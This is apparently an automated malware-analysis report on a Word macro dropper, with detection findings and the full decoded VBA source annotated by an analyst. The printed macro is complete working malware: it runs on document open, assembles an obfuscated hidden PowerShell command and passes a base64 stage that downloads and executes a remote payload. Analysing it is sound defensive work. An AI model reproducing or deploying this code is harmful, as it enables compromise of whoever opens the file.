MALICIOUS
170
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample is a malicious Office document containing a VBA macro with an AutoOpen subroutine. The macro issues a Shell() call, indicating an attempt to execute an external command. The ClamAV detection name 'Doc.Dropper.Agent-6460481-0' further supports classifying it as a dropper. The macro's obfuscated string concatenation suggests it is preparing to download and execute a secondary payload.
Heuristics 6
-
ClamAV: Doc.Dropper.Agent-6460481-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6460481-0
-
VBA macros detected — medium — 2 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA. Matched line in script:
IN_PA = IN_PA + JP_NF Shell$ IN_PA End Sub -
AutoOpen macro — low — OLE_VBA_AUTOOPEN: AutoOpen macro. Matched line in script:
Attribute VB_Name = "cherrycoke" Sub AutoOpen() Dim IN_PA As String -
Legacy WordBasic auto-exec macro marker — medium — OLE_LEGACY_WORDBASIC_AUTOEXEC: OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6164 bytes |
| SHA-256: e2619aedabeaa521ad516c8d0dfa1bf4fb311876037e9a442bb04ff61695c9d9 | | | |
Preview script — first 1,000 lines of the extracted script:
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module header of the document's own class module (ThisDocument). No
' procedure body appears between this header and the next module's, so the
' executable code is not here. The extracted listing concatenates two
' modules: the ThisDocument header above and the standard module
' "cherrycoke" below, which is where the AutoOpen procedure lives.
Attribute VB_Name = "cherrycoke"
' Standard module "cherrycoke" - the module that carries the AutoOpen code.
' AutoOpen runs automatically when Word opens the document (the report's
' OLE_VBA_AUTOOPEN finding). The procedure itself decodes nothing: it only
' builds two strings and hands their concatenation to Shell$ at the end.
'
'   IN_PA  - assembled one character at a time by indexing the 20-entry
'            alphabet JT_QH. Reading the index sequence (9,2,19,1,6,4,15,
'            1,8,8,0,11,...) against the array spells a PowerShell command
'            line with a hidden window, a bypassed execution policy and the
'            encoded-command switch ("-e "), i.e. the OLE_VBA_SHELL finding.
'   JP_NF  - a single base64 blob assembled from ~45 short chunks. The "A"
'            recurring at regular positions is the tell-tale of zero bytes
'            between ASCII characters, i.e. UTF-16LE text, which is what the
'            encoded-command switch expects.
'
' The two assemblies are interleaved statement by statement so that neither
' the command line nor the base64 text appears contiguously in the source;
' a plain string signature on either would not match. Detection is better
' placed on the runtime behaviour: a Word process spawning a script host
' with an encoded-command argument.
'
' NOTE(review): decoding JP_NF appears to give a short PowerShell stage that
' fetches JSON over HTTPS from what looks like a cloud table-storage REST
' endpoint with a signed query string, base64-decodes a field of the
' response and executes it. The actual download URL therefore exists only
' inside this blob, which is why the report's EMBEDDED_URL finding lists
' only the harmless OOXML schema namespace. Confirm against an offline
' decode before treating any of this as an indicator.
'
' JT_QH and JP_NF are never declared (no Option Explicit in the listing),
' so both are implicit Variants; JP_NF starts Empty and the first "&"
' coerces it to "".
Sub AutoOpen()
Dim IN_PA As String
' 20-character alphabet; every IN_PA line below picks one entry by index.
JT_QH = Array(" ", "e", "o", "t", "s", "a", "r", "x", "l", "p", "n", "-", "u", "c", "b", "h", "y", "d", "i", "w")
Dim DS_QF As String
DS_QF = "ZgB1AG4AYwB0"
IN_PA = IN_PA + JT_QH(9)
IN_PA = IN_PA + JT_QH(2)
Dim IT_LI As String
IT_LI = "AGkAbwBuACAAYQAoACQ"
IN_PA = IN_PA + JT_QH(19)
IN_PA = IN_PA + JT_QH(1)
Dim FS_TJ As String
FS_TJ = "AeAApAHsAcgBlAHQAdQByAG4A"
IN_PA = IN_PA + JT_QH(6)
IN_PA = IN_PA + JT_QH(4)
Dim AN_QJ As String
AN_QJ = "IABbAFMAeQBzAHQAZQBt"
IN_PA = IN_PA + JT_QH(15)
IN_PA = IN_PA + JT_QH(1)
Dim GM_LI As String
GM_LI = "AC4AVABlAHgAdAAuAEUAbgBjAG8AZABpA"
' Chunks are appended to JP_NF in batches of five; order matters, the
' batches are the base64 text in sequence.
JP_NF = JP_NF & DS_QF & IT_LI & FS_TJ & AN_QJ & GM_LI
IN_PA = IN_PA + JT_QH(8)
IN_PA = IN_PA + JT_QH(8)
Dim HT_MD As String
HT_MD = "G4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuA"
IN_PA = IN_PA + JT_QH(0)
IN_PA = IN_PA + JT_QH(11)
Dim CN_LF As String
CN_LF = "GcAKABbAFMAeQBzAHQAZQ"
IN_PA = IN_PA + JT_QH(19)
IN_PA = IN_PA + JT_QH(18)
Dim BR_MI As String
BR_MI = "BtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwB"
IN_PA = IN_PA + JT_QH(10)
IN_PA = IN_PA + JT_QH(17)
Dim AQ_NB As String
AQ_NB = "tAEIAYQBzAGUANgA0AFMAdAByAGkAbg"
IN_PA = IN_PA + JT_QH(2)
IN_PA = IN_PA + JT_QH(19)
Dim GK_NE As String
GK_NE = "BnACgAJAB4ACkAKQB9ADsAaQ"
JP_NF = JP_NF & HT_MD & CN_LF & BR_MI & AQ_NB & GK_NE
IN_PA = IN_PA + JT_QH(4)
IN_PA = IN_PA + JT_QH(3)
Dim BM_OD As String
BM_OD = "BlAHgAIAAkACgAYQAgACQAKAAkACgAJA"
IN_PA = IN_PA + JT_QH(16)
IN_PA = IN_PA + JT_QH(8)
Dim GO_SI As String
GO_SI = "AoAGkAbgB2AG8AawBlAC0AdwBlAGIAc"
IN_PA = IN_PA + JT_QH(1)
IN_PA = IN_PA + JT_QH(0)
Dim AQ_KJ As String
AQ_KJ = "gBlAHEAdQBlAHMAdAAgACcAaAB0AHQAcABzADoALwAvAHUA"
IN_PA = IN_PA + JT_QH(15)
IN_PA = IN_PA + JT_QH(18)
Dim AS_TJ As String
AS_TJ = "cwBwAHIAZAA1ADEANQ"
IN_PA = IN_PA + JT_QH(17)
IN_PA = IN_PA + JT_QH(17)
Dim DT_LF As String
DT_LF = "AwAGMAZQBuA"
JP_NF = JP_NF & BM_OD & GO_SI & AQ_KJ & AS_TJ & DT_LF
IN_PA = IN_PA + JT_QH(1)
IN_PA = IN_PA + JT_QH(10)
Dim IO_SH As String
IO_SH = "HQAcgBhAGwALgB0AGEAYgBsAGUALgBjAG8AcgBlAC4Adw"
IN_PA = IN_PA + JT_QH(0)
IN_PA = IN_PA + JT_QH(11)
Dim HN_SI As String
HN_SI = "BpAG4AZ"
IN_PA = IN_PA + JT_QH(1)
IN_PA = IN_PA + JT_QH(7)
Dim IM_NI As String
IM_NI = "ABvAHcAcwAuAG4AZQB0AC8AdwBhAHI"
IN_PA = IN_PA + JT_QH(1)
IN_PA = IN_PA + JT_QH(13)
Dim HS_KF As String
HS_KF = "AZQBoAG8AdQBzAGUAPwAkAGYAaQBsAHQAZQByAD0AUABhAH"
IN_PA = IN_PA + JT_QH(12)
IN_PA = IN_PA + JT_QH(3)
Dim HR_KI As String
HR_KI = "IAdABpAHQAaQBvAG4ASwBlAHkAJQAyADAAZ"
JP_NF = JP_NF & IO_SH & HN_SI & IM_NI & HS_KF & HR_KI
IN_PA = IN_PA + JT_QH(18)
IN_PA = IN_PA + JT_QH(2)
Dim FR_LD As String
FR_LD = "QBxACUAMgAwACUAMgA3AHMA"
IN_PA = IN_PA + JT_QH(10)
IN_PA = IN_PA + JT_QH(9)
Dim DR_NI As String
DR_NI = "dABhAGcAZQAlADIANwAmACQAUwBlAGwAZQ"
IN_PA = IN_PA + JT_QH(2)
IN_PA = IN_PA + JT_QH(8)
Dim CL_LG As String
CL_LG = "BjAHQAPQBkAGEAdABhACYAc"
IN_PA = IN_PA + JT_QH(18)
IN_PA = IN_PA + JT_QH(13)
Dim EP_LH As String
EP_LH = "wB2AD0AMgAwADEAN"
IN_PA = IN_PA + JT_QH(16)
IN_PA = IN_PA + JT_QH(0)
Dim FT_NF As String
FT_NF = "wAtADAANAAtADEANwAmAHMAcwA9AGIAZgBxA"
JP_NF = JP_NF & FR_LD & DR_NI & CL_LG & EP_LH & FT_NF
IN_PA = IN_PA + JT_QH(14)
IN_PA = IN_PA + JT_QH(16)
Dim DT_MC As String
DT_MC = "HQAJgBz"
IN_PA = IN_PA + JT_QH(9)
IN_PA = IN_PA + JT_QH(5)
Dim HR_MB As String
HR_MB = "AHIAdAA9AHMAYwBvACYAcwBwAD0AcgB3AGQAbABhA"
IN_PA = IN_PA + JT_QH(4)
IN_PA = IN_PA + JT_QH(4)
Dim ET_NJ As String
ET_NJ = "GMAdQBwACYAcwBlAD0AMgAwADEANwAtADEAMA"
IN_PA = IN_PA + JT_QH(0)
IN_PA = IN_PA + JT_QH(11)
Dim EL_OA As String
EL_OA = "AtADAANgBUADIAMgA6ADQAMQA6ADEAMgBaACYAcwB"
IN_PA = IN_PA + JT_QH(1)
' Last alphabet pick: IN_PA now ends in the encoded-command switch and a
' trailing space, ready for the base64 argument.
IN_PA = IN_PA + JT_QH(0)
Dim JS_SD As String
JS_SD = "0AD0AMgAwADEANwAtADAAOQAtADIAOABUADEANAA6ADQAMQA6A"
JP_NF = JP_NF & DT_MC & HR_MB & ET_NJ & EL_OA & JS_SD
' From here on only base64 chunks are declared; the command line is
' complete and no further JT_QH lookups occur.
Dim FL_PE As String
FL_PE = "DEAMgBaACYA"
Dim EK_OC As String
EK_OC = "cwBwAHIAPQBoAHQAd"
Dim FS_KJ As String
FS_KJ = "ABwAHMAJgBzAGkAZwA9AHQA"
Dim EP_NH As String
EP_NH = "egBQADcAYwA4AHgAWgBoAH"
Dim FO_ND As String
FO_ND = "IAMQBzAGIAdgB4ADkAZgBKAFMAdwBKAEkAU"
JP_NF = JP_NF & FL_PE & EK_OC & FS_KJ & EP_NH & FO_ND
Dim FN_LG As String
FN_LG = "wBIAEIANgBlADgAJQAyAEI"
Dim DQ_TG As String
DQ_TG = "AbgBsAGwAdQBuAEgAaQBmAEwAMwBoAH"
Dim AM_LI As String
AM_LI = "gAagA0ACUAMwB"
Dim HO_LC As String
HO_LC = "EACcAIAAtAEgAZQB"
Dim GP_TI As String
GP_TI = "hAGQAZQByAHMAIABAAHsAJwB"
JP_NF = JP_NF & FN_LG & DQ_TG & AM_LI & HO_LC & GP_TI
Dim FS_TA As String
FS_TA = "BAGMAYwBlAHAAdAAn"
Dim JP_ND As String
JP_ND = "AD0AJwBBAHA"
Dim DQ_RJ As String
DQ_RJ = "AcABsAGkAYwBh"
Dim FL_SJ As String
FL_SJ = "AHQAaQBvAG4ALwBKAFMATwBOAC"
Dim BP_KE As String
BP_KE = "cAfQApAC4AQwBvAG4AdABlAG4AdAAgAHw"
JP_NF = JP_NF & FS_TA & JP_ND & DQ_RJ & FL_SJ & BP_KE
Dim FT_LG As String
FT_LG = "AIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBK"
JP_NF = JP_NF & FT_LG
Dim CN_MF As String
CN_MF = "AHMAbwBuACkALgB2AGEAbAB1AGUALgBkAGEAdABhAC"
JP_NF = JP_NF & CN_MF
Dim HR_RB As String
' Final chunk; the trailing "=" is base64 padding, confirming JP_NF is one
' complete base64 string rather than several.
HR_RB = "kAKQA="
JP_NF = JP_NF & HR_RB
' Command line + encoded argument become a single string.
IN_PA = IN_PA + JP_NF
' Hands the assembled line to the OS via Shell$ (the OLE_VBA_SHELL finding).
' The child runs with the privileges of the user who opened the document;
' the macro itself writes nothing to disk - everything after this point
' happens in the spawned process.
Shell$ IN_PA
End Sub
|
|||